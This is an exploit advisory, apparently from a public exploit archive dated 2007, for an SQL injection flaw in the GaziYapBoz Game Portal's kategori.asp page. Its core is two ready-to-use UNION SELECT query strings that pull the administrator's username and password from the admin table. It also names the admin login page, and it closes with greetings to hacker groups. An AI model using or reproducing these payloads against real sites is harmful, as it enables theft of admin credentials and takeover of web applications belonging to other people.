GaziYapBoz Game Portal (kategori.asp) Remote SQL Injection Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GaziYapBoz Game Portal (kategori.asp) Remote SQL Injection Vuln
# Published : 2007-03-08
# Author : CyberGhost
# Previous Title : WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vuln
# Next Title : Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# www.Syue.com [2007-03-08]